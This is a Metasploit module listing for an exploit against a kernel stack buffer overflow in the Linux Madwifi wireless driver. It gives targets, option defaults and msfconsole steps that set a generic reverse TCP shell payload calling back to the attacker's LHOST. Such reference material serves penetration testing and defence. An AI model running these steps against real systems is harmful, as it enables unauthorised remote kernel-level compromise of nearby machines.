Browse Exploit & Auxiliary Modules

The Metasploit Project hosts the world's largest database of quality assured exploits, including hundreds of remote exploits, auxiliary modules, and payloads. You can even review the Metasploit Framework source code of any module - or write your own.

Search for modules

Madwifi SIOCGIWSCAN Buffer Overflow

The Madwifi driver under Linux is vulnerable to a remote kernel-mode stack-based buffer overflow. The vulnerability is triggered by one of these properly crafted information element: WPA, RSN, WME and Atheros OUI Current madwifi driver (0.9.2) and and all madwifi-ng drivers since r1504 are vulnerable Madwifi 0.9.2.1 release corrects the issue. This module has been tested against Ubuntu 6.10 and is 100% reliable, doesn\'t crash the Wifi stack and can exploit the same machine multiple time without the need to reboot it. This module depends on the Lorcon2 library and only works on the Linux platform with a supported wireless card. Please see the Ruby Lorcon2 documentation (external/ruby-lorcon/README) for more information.


Rank

  • Average

Authors

  • Julien Tinnes < julien at cr0.org >
  • Laurent Butti < 0x9090 at gmail.com >

References


Exploit Targets

  • 0 - Ubuntu 6.10
  • 1 - Generic (you need non randomized vdso)

Development


Similar Modules


Usage Information

$ msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use exploit/linux/madwifi/madwifi_giwscan_cb
msf exploit(madwifi_giwscan_cb) > show payloads
msf exploit(madwifi_giwscan_cb) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(madwifi_giwscan_cb) > set LHOST [MY IP ADDRESS]
msf exploit(madwifi_giwscan_cb) > show targets
msf exploit(madwifi_giwscan_cb) > set TARGET [TARGET ID]
msf exploit(madwifi_giwscan_cb) > exploit


Module Options

ADDR_DST The MAC address of the target system (default: FF:FF:FF:FF:FF:FF)
CHANNEL The initial channel (default: 11)
DRIVER The name of the wireless driver for lorcon (default: autodetect)
INTERFACE The name of the wireless interface (default: wlan0)
LENGTH Length after local variables in giwscan_cb() to overwrite (default: 24)
RUNTIME The number of seconds to run the attack (default: 600)
SINGLESHOT Break after first victim (for msfcli) (default: false)
SSID The SSID of the emulated access point (default: test)
ContextInformationFile The information file that contains context information
DisablePayloadHandler Disable the handler code for the selected payload
EnableContextEncoding Use transient context when encoding payloads
VERBOSE Enable detailed status messages
WORKSPACE Specify the workspace for this module
WfsDelay Additional delay when waiting for a session